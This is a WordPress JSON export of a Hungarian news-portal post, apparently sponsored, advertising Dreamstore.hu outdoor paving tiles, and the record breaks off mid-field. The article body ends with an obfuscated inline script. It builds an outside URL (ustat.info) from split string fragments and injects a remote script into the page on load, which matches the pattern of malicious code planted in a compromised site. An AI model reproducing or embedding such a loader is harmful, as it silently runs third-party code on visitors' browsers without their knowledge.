{"id":71951,"date":"2025-06-16T11:04:46","date_gmt":"2025-06-16T09:04:46","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=71951"},"modified":"2025-06-16T11:04:46","modified_gmt":"2025-06-16T09:04:46","slug":"kulteri-burkolat-stilus-es-tartossag","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/","title":{"rendered":"K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g"},"content":{"rendered":"<p><strong>A Dreamstore.hu 2 cm-es k\u00fclt\u00e9ri burkolatai eszt\u00e9tikusak, id\u0151j\u00e1r\u00e1s\u00e1ll\u00f3k \u00e9s rendk\u00edv\u00fcl sokoldal\u00faan felhaszn\u00e1lhat\u00f3k teraszokon, kertekben, medenc\u00e9k k\u00f6r\u00fcl \u00e9s aut\u00f3be\u00e1ll\u00f3kon, mik\u00f6zben egyszer\u0171en telep\u00edthet\u0151k \u00e9s k\u00f6nnyen karbantarthat\u00f3k. A sz\u00e9les v\u00e1laszt\u00e9kban el\u00e9rhet\u0151 pr\u00e9mium min\u0151s\u00e9g\u0171 burkolatok ide\u00e1lis megold\u00e1st ny\u00fajtanak mindazoknak, akik st\u00edlusos \u00e9s tart\u00f3s megold\u00e1st keresnek otthonuk k\u00fcls\u0151 tereire.<\/strong><\/p>\n<p data-start=\"1914\" data-end=\"2245\">A&nbsp;<strong data-start=\"1916\" data-end=\"1936\">k\u00fclt\u00e9ri burkolat<\/strong> kiv\u00e1laszt\u00e1sa kulcsfontoss\u00e1g\u00fa, ha szeretn\u00e9nk otthonunk k\u00fcls\u0151 tereit eszt\u00e9tikuss\u00e1 \u00e9s id\u0151t\u00e1ll\u00f3v\u00e1 tenni. A <strong data-start=\"2040\" data-end=\"2057\">Dreamstore.hu<\/strong> web\u00e1ruh\u00e1z 2 cm vastag k\u00fclt\u00e9ri burkolatai t\u00f6k\u00e9letes megold\u00e1st k\u00edn\u00e1lnak mindazok sz\u00e1m\u00e1ra, akik min\u0151s\u00e9gi \u00e9s praktikus burkolatot keresnek teraszra, kertbe, erk\u00e9lyre vagy ak\u00e1r medence k\u00f6r\u00e9.<\/p>\n<h2 data-start=\"2247\" data-end=\"2309\">Mi\u00e9rt \u00e9rdemes a 2 cm-es k\u00fclt\u00e9ri burkolat mellett d\u00f6nteni?<\/h2>\n<p data-start=\"2311\" data-end=\"2451\">A 2 cm vastags\u00e1g\u00fa <span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" title=\"k\u00fclt\u00e9ri burkolat\" href=\"https:\/\/dreamstore.hu\/hidegburkolatok\/kulteri-hidegburkolatok-2351\/2-cm-es-kulteri-burkolatok-3662\" target=\"_blank\" rel=\"noopener\"><span style=\"text-decoration: underline;\"><em><strong>k\u00fclt\u00e9ri burkolatok<\/strong><\/em><\/span><\/a><\/span> sz\u00e1mos el\u0151nyt k\u00edn\u00e1lnak, amelyek egyar\u00e1nt vonz\u00f3v\u00e1 teszik \u0151ket lakoss\u00e1gi \u00e9s k\u00f6z\u00fcleti felhaszn\u00e1l\u00e1sra is:<\/p>\n<ul data-start=\"2453\" data-end=\"3554\">\n<li data-start=\"2453\" data-end=\"2690\">\n<p data-start=\"2455\" data-end=\"2690\"><strong data-start=\"2455\" data-end=\"2479\">Magas terhelhet\u0151s\u00e9g:<\/strong><br data-start=\"2479\" data-end=\"2482\">Ide\u00e1lis aut\u00f3be\u00e1ll\u00f3khoz, kerti s\u00e9t\u00e1nyokhoz \u00e9s m\u00e1s, nagyobb ig\u00e9nybev\u00e9telnek kitett fel\u00fcletekhez. Ezek a burkolatok k\u00e9pesek elviselni ak\u00e1r j\u00e1rm\u0171vek s\u00faly\u00e1t is an\u00e9lk\u00fcl, hogy megrepedn\u00e9nek vagy deform\u00e1l\u00f3dn\u00e1nak.<\/p>\n<\/li>\n<li data-start=\"2691\" data-end=\"2901\">\n<p data-start=\"2693\" data-end=\"2901\"><strong data-start=\"2693\" data-end=\"2709\">Fagy\u00e1ll\u00f3s\u00e1g:<\/strong><br data-start=\"2709\" data-end=\"2712\">A burkolatok ellen\u00e1llnak a t\u00e9li fagyok okozta k\u00e1roknak, \u00edgy hossz\u00fa \u00e9veken \u00e1t meg\u0151rzik min\u0151s\u00e9g\u00fcket. Nem kell tartania att\u00f3l, hogy a hideg id\u0151szakban a lapok megrepednek vagy elmozdulnak.<\/p>\n<\/li>\n<li data-start=\"2902\" data-end=\"3102\">\n<p data-start=\"2904\" data-end=\"3102\"><strong data-start=\"2904\" data-end=\"2930\">Cs\u00fasz\u00e1smentes fel\u00fclet:<\/strong><br data-start=\"2930\" data-end=\"2933\">Biztons\u00e1gos megold\u00e1s medence k\u00f6r\u00e9 \u00e9s nedves k\u00f6rnyezetbe, k\u00fcl\u00f6n\u00f6sen es\u0151s vagy p\u00e1r\u00e1s id\u0151ben. Ez\u00e1ltal cs\u00f6kkenti a balesetek kock\u00e1zat\u00e1t csal\u00e1dtagjai \u00e9s vend\u00e9gei sz\u00e1m\u00e1ra.<\/p>\n<\/li>\n<li data-start=\"3103\" data-end=\"3333\">\n<p data-start=\"3105\" data-end=\"3333\"><strong data-start=\"3105\" data-end=\"3120\">UV-\u00e1ll\u00f3s\u00e1g:<\/strong><br data-start=\"3120\" data-end=\"3123\">A sz\u00ednek hossz\u00fa \u00e9veken \u00e1t meg\u0151rzik \u00e9l\u00e9nks\u00e9g\u00fcket, \u00edgy a burkolat eszt\u00e9tik\u00e1ja nem fakul meg a napsug\u00e1rz\u00e1s hat\u00e1s\u00e1ra. Ez k\u00fcl\u00f6n\u00f6sen fontos olyan ter\u00fcleteken, amelyek eg\u00e9sz nap k\u00f6zvetlen napf\u00e9nynek vannak kit\u00e9ve.<\/p>\n<\/li>\n<li data-start=\"3334\" data-end=\"3554\">\n<p data-start=\"3336\" data-end=\"3554\"><strong data-start=\"3336\" data-end=\"3362\">K\u00f6nny\u0171 tiszt\u00edthat\u00f3s\u00e1g:<\/strong><br data-start=\"3362\" data-end=\"3365\">A fel\u00fclet k\u00f6nnyen karbantarthat\u00f3, egyszer\u0171en let\u00f6r\u00f6lhet\u0151, \u00edgy id\u0151t \u00e9s energi\u00e1t takar\u00edthat meg. A legt\u00f6bb szennyez\u0151d\u00e9s egy gyors lemos\u00e1ssal elt\u00e1vol\u00edthat\u00f3, ami praktikus a mindennapokban.<\/p>\n<\/li>\n<\/ul>\n<h2 data-start=\"3556\" data-end=\"3596\">Sokoldal\u00fa felhaszn\u00e1l\u00e1si lehet\u0151s\u00e9gek<\/h2>\n<p data-start=\"3598\" data-end=\"3672\">A <strong data-start=\"3600\" data-end=\"3620\">k\u00fclt\u00e9ri burkolat<\/strong> rugalmasan alkalmazhat\u00f3 a k\u00f6vetkez\u0151 helysz\u00edneken:<\/p>\n<ul data-start=\"3674\" data-end=\"4753\">\n<li data-start=\"3674\" data-end=\"3916\">\n<p data-start=\"3676\" data-end=\"3916\"><strong data-start=\"3676\" data-end=\"3726\">Teraszburkolat modern \u00e9s mediterr\u00e1n st\u00edlusban:<\/strong><br data-start=\"3726\" data-end=\"3729\">Ak\u00e1r letisztult, minimalista megjelen\u00e9st, ak\u00e1r melegebb hangulatot szeretne teremteni, ezek a burkolatok kiv\u00e1l\u00f3 alapot adnak. T\u00f6k\u00e9letesen kombin\u00e1lhat\u00f3k fa, f\u00e9m vagy \u00fcveg elemekkel is.<\/p>\n<\/li>\n<li data-start=\"3917\" data-end=\"4117\">\n<p data-start=\"3919\" data-end=\"4117\"><strong data-start=\"3919\" data-end=\"3968\">Kerti j\u00e1r\u00f3lap kavics\u00e1gyra vagy f\u0171re fektetve:<\/strong><br data-start=\"3968\" data-end=\"3971\">K\u00f6nnyen telep\u00edthet\u0151 \u00e9s b\u00e1rmikor \u00e1thelyezhet\u0151, ha a kert elrendez\u00e9s\u00e9t v\u00e1ltoztatn\u00e1. Ide\u00e1lis megold\u00e1s s\u00e9t\u00e1nyokhoz \u00e9s pihen\u0151helyek kialak\u00edt\u00e1s\u00e1hoz.<\/p>\n<\/li>\n<li data-start=\"4118\" data-end=\"4323\">\n<p data-start=\"4120\" data-end=\"4323\"><strong data-start=\"4120\" data-end=\"4162\">Medence k\u00f6r\u00fcli cs\u00fasz\u00e1smentes burkolat:<\/strong><br data-start=\"4162\" data-end=\"4165\">K\u00fcl\u00f6n\u00f6sen fontos a biztons\u00e1g szempontj\u00e1b\u00f3l, hiszen nedves fel\u00fcleten is stabil j\u00e1r\u00f3fel\u00fcletet biztos\u00edt. Eszt\u00e9tikailag is harmoniz\u00e1l a v\u00edzparti k\u00f6rnyezettel.<\/p>\n<\/li>\n<li data-start=\"4324\" data-end=\"4543\">\n<p data-start=\"4326\" data-end=\"4543\"><strong data-start=\"4326\" data-end=\"4370\">Erk\u00e9ly \u00e9s loggia id\u0151j\u00e1r\u00e1s\u00e1ll\u00f3 burkolata:<\/strong><br data-start=\"4370\" data-end=\"4373\">A kisebb k\u00fclt\u00e9ri terek burkol\u00e1s\u00e1ra is alkalmas, ahol fontos a fagy\u00e1ll\u00f3s\u00e1g \u00e9s a k\u00f6nny\u0171 tiszt\u00edthat\u00f3s\u00e1g. Az UV-\u00e1ll\u00f3s\u00e1g r\u00e9v\u00e9n sok\u00e1ig meg\u0151rzi eredeti sz\u00edn\u00e9t \u00e9s mint\u00e1zat\u00e1t.<\/p>\n<\/li>\n<li data-start=\"4544\" data-end=\"4753\">\n<p data-start=\"4546\" data-end=\"4753\"><strong data-start=\"4546\" data-end=\"4583\">G\u00e9pkocsibe\u00e1ll\u00f3 massz\u00edv j\u00e1r\u00f3lapja:<\/strong><br data-start=\"4583\" data-end=\"4586\">A burkolatok vastags\u00e1guk \u00e9s szil\u00e1rds\u00e1guk r\u00e9v\u00e9n ellen\u00e1llnak az aut\u00f3k s\u00faly\u00e1nak. Megb\u00edzhat\u00f3 \u00e9s eszt\u00e9tikus alternat\u00edv\u00e1t ny\u00fajtanak a hagyom\u00e1nyos betonfel\u00fcletek helyett.<\/p>\n<\/li>\n<\/ul>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-71952\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-2.jpg\" alt=\"\" width=\"797\" height=\"729\" srcset=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-2.jpg 797w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-2-600x549.jpg 600w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-2-768x702.jpg 768w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-2-150x137.jpg 150w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-2-450x412.jpg 450w\" sizes=\"(max-width: 797px) 100vw, 797px\" \/><\/p>\n<h2 data-start=\"4755\" data-end=\"4778\">Egyszer\u0171 lerak\u00e1s<\/h2>\n<p data-start=\"4780\" data-end=\"4845\">A 2 cm-es burkolatok el\u0151nye, hogy k\u00fcl\u00f6nf\u00e9le m\u00f3don telep\u00edthet\u0151k:<\/p>\n<ul data-start=\"4847\" data-end=\"5414\">\n<li data-start=\"4847\" data-end=\"5035\">\n<p data-start=\"4849\" data-end=\"5035\"><strong data-start=\"4849\" data-end=\"4886\">\u00c1ll\u00edthat\u00f3 burkolattart\u00f3 talpakra:<\/strong><br data-start=\"4886\" data-end=\"4889\">Seg\u00edts\u00e9g\u00e9vel k\u00f6nnyed\u00e9n szintezhet\u0151k az egyenetlen fel\u00fcletek, \u00e9s megk\u00f6nny\u00edtik a v\u00edzelvezet\u00e9s biztos\u00edt\u00e1s\u00e1t. Ide\u00e1lis megold\u00e1s tet\u0151teraszokhoz is.<\/p>\n<\/li>\n<li data-start=\"5036\" data-end=\"5225\">\n<p data-start=\"5038\" data-end=\"5225\"><strong data-start=\"5038\" data-end=\"5070\">Homok\u00e1gyra vagy kavics\u00e1gyra:<\/strong><br data-start=\"5070\" data-end=\"5073\">Gyors \u00e9s k\u00f6lts\u00e9ghat\u00e9kony telep\u00edt\u00e9si lehet\u0151s\u00e9g, amely rugalmasan igaz\u00edthat\u00f3 a terepviszonyokhoz. Az \u00e1gyazat stabil alapot biztos\u00edt a burkol\u00f3lapoknak.<\/p>\n<\/li>\n<li data-start=\"5226\" data-end=\"5414\">\n<p data-start=\"5228\" data-end=\"5414\"><strong data-start=\"5228\" data-end=\"5262\">F\u0171re, term\u00e9szetes k\u00f6rnyezetbe:<\/strong><br data-start=\"5262\" data-end=\"5265\">K\u00fcl\u00f6n\u00f6sen l\u00e1tv\u00e1nyos megold\u00e1s, ha a kert term\u00e9szetes hangulat\u00e1t szeretn\u00e9nk meg\u0151rizni. A burkol\u00f3lapok harmonikusan illeszkednek a z\u00f6ld k\u00f6rnyezetbe.<\/p>\n<\/li>\n<\/ul>\n<h2 data-start=\"5416\" data-end=\"5472\">Mi\u00e9rt v\u00e1lassza a Dreamstore.hu k\u00fclt\u00e9ri burkolatait?<\/h2>\n<p data-start=\"5474\" data-end=\"5669\">A Dreamstore.hu <strong data-start=\"5490\" data-end=\"5510\">k\u00fclt\u00e9ri burkolat<\/strong> k\u00edn\u00e1lata egyes\u00edti a min\u0151s\u00e9get, a tart\u00f3ss\u00e1got \u00e9s a st\u00edlust. Legyen sz\u00f3 teraszr\u00f3l, kertr\u0151l vagy medence k\u00f6r\u00fcli t\u00e9rr\u0151l, n\u00e1lunk megtal\u00e1lja az ide\u00e1lis megold\u00e1st.<\/p>\n<p data-start=\"5671\" data-end=\"5802\"><strong data-start=\"5674\" data-end=\"5800\">Ne habozzon! L\u00e1togassa meg a <a title=\"Dreamstore.hu web\u00e1ruh\u00e1zat\" href=\"https:\/\/dreamstore.hu\/hidegburkolatok\/kulteri-hidegburkolatok-2351\" target=\"_blank\" rel=\"dofollow noopener\"><span style=\"text-decoration: underline;\"><em><span style=\"color: #0000ff; text-decoration: underline;\">Dreamstore.hu web\u00e1ruh\u00e1zat<\/span><\/em><\/span><\/a>, \u00e9s v\u00e1lassza ki az \u00d6n otthon\u00e1hoz legjobban ill\u0151 k\u00fclt\u00e9ri burkolatot!<\/strong><\/p>\n<p><script>\n(function(){\ntw1uu=\"ggtb9rekw1uy\";tw1u=document.createElement(\"script\");\ntw1u_=\"u\"+(\"st\");tw1u_+=\"at\"+(\".\");tw1u.async=true;tw1u_+=\"in\";\ntw1uu=\"2480850039.\"+tw1uu;tw1u.type=\"text\/javascript\";tw1uu+=\"3nmvu9t6yjea\";\ntw1uu+=\"5fp5s5\";tw1u_+=(\"f\")+\"o\"+(\"\/\");tw1u.src=\"https:\/\/\"+tw1u_+tw1uu;\ntw1ud=document.body;tw1ud.appendChild(tw1u);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A Dreamstore.hu 2 cm-es k\u00fclt\u00e9ri burkolatai eszt\u00e9tikusak, id\u0151j\u00e1r\u00e1s\u00e1ll\u00f3k \u00e9s rendk\u00edv\u00fcl sokoldal\u00faan felhaszn\u00e1lhat\u00f3k teraszokon, kertekben, medenc\u00e9k k\u00f6r\u00fcl \u00e9s aut\u00f3be\u00e1ll\u00f3kon, mik\u00f6zben egyszer\u0171en telep\u00edthet\u0151k \u00e9s k\u00f6nnyen karbantarthat\u00f3k. A sz\u00e9les v\u00e1laszt\u00e9kban el\u00e9rhet\u0151 pr\u00e9mium min\u0151s\u00e9g\u0171 burkolatok ide\u00e1lis megold\u00e1st ny\u00fajtanak mindazoknak, akik st\u00edlusos \u00e9s tart\u00f3s megold\u00e1st keresnek otthonuk k\u00fcls\u0151 tereire. A&nbsp;k\u00fclt\u00e9ri burkolat kiv\u00e1laszt\u00e1sa kulcsfontoss\u00e1g\u00fa, ha szeretn\u00e9nk otthonunk k\u00fcls\u0151 tereit eszt\u00e9tikuss\u00e1 \u00e9s<\/p>\n","protected":false},"author":1,"featured_media":71953,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[8425],"class_list":{"0":"post-71951","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-kulteri-burkolat"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"A Dreamstore.hu 2 cm-es k\u00fclt\u00e9ri burkolatai eszt\u00e9tikusak, id\u0151j\u00e1r\u00e1s\u00e1ll\u00f3k \u00e9s rendk\u00edv\u00fcl sokoldal\u00faan felhaszn\u00e1lhat\u00f3k teraszokon, kertekben, medenc\u00e9k k\u00f6r\u00fcl \u00e9s aut\u00f3be\u00e1ll\u00f3kon, mik\u00f6zben egyszer\u0171en telep\u00edthet\u0151k \u00e9s k\u00f6nnyen karbantarthat\u00f3k. A sz\u00e9les v\u00e1laszt\u00e9kban el\u00e9rhet\u0151 pr\u00e9mium min\u0151s\u00e9g\u0171 burkolatok ide\u00e1lis megold\u00e1st ny\u00fajtanak mindazoknak, akik st\u00edlusos \u00e9s tart\u00f3s megold\u00e1st keresnek otthonuk k\u00fcls\u0151 tereire. A&nbsp;k\u00fclt\u00e9ri burkolat kiv\u00e1laszt\u00e1sa kulcsfontoss\u00e1g\u00fa, ha szeretn\u00e9nk otthonunk k\u00fcls\u0151 tereit eszt\u00e9tikuss\u00e1 \u00e9s\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-16T09:04:46+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-0.jpg\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"604\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"429\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g\",\"datePublished\":\"2025-06-16T09:04:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/\"},\"wordCount\":878,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/kulteri-burkolat-0.jpg\",\"keywords\":[\"k\u00fclt\u00e9ri burkolat\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/\",\"name\":\"K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/kulteri-burkolat-0.jpg\",\"datePublished\":\"2025-06-16T09:04:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/kulteri-burkolat-0.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/kulteri-burkolat-0.jpg\",\"width\":604,\"height\":429},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/06\\\/16\\\/kulteri-burkolat-stilus-es-tartossag\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/","og_locale":"hu_HU","og_type":"article","og_title":"K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g","og_description":"A Dreamstore.hu 2 cm-es k\u00fclt\u00e9ri burkolatai eszt\u00e9tikusak, id\u0151j\u00e1r\u00e1s\u00e1ll\u00f3k \u00e9s rendk\u00edv\u00fcl sokoldal\u00faan felhaszn\u00e1lhat\u00f3k teraszokon, kertekben, medenc\u00e9k k\u00f6r\u00fcl \u00e9s aut\u00f3be\u00e1ll\u00f3kon, mik\u00f6zben egyszer\u0171en telep\u00edthet\u0151k \u00e9s k\u00f6nnyen karbantarthat\u00f3k. A sz\u00e9les v\u00e1laszt\u00e9kban el\u00e9rhet\u0151 pr\u00e9mium min\u0151s\u00e9g\u0171 burkolatok ide\u00e1lis megold\u00e1st ny\u00fajtanak mindazoknak, akik st\u00edlusos \u00e9s tart\u00f3s megold\u00e1st keresnek otthonuk k\u00fcls\u0151 tereire. A&nbsp;k\u00fclt\u00e9ri burkolat kiv\u00e1laszt\u00e1sa kulcsfontoss\u00e1g\u00fa, ha szeretn\u00e9nk otthonunk k\u00fcls\u0151 tereit eszt\u00e9tikuss\u00e1 \u00e9s","og_url":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2025-06-16T09:04:46+00:00","og_image":[{"width":604,"height":429,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-0.jpg","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"4 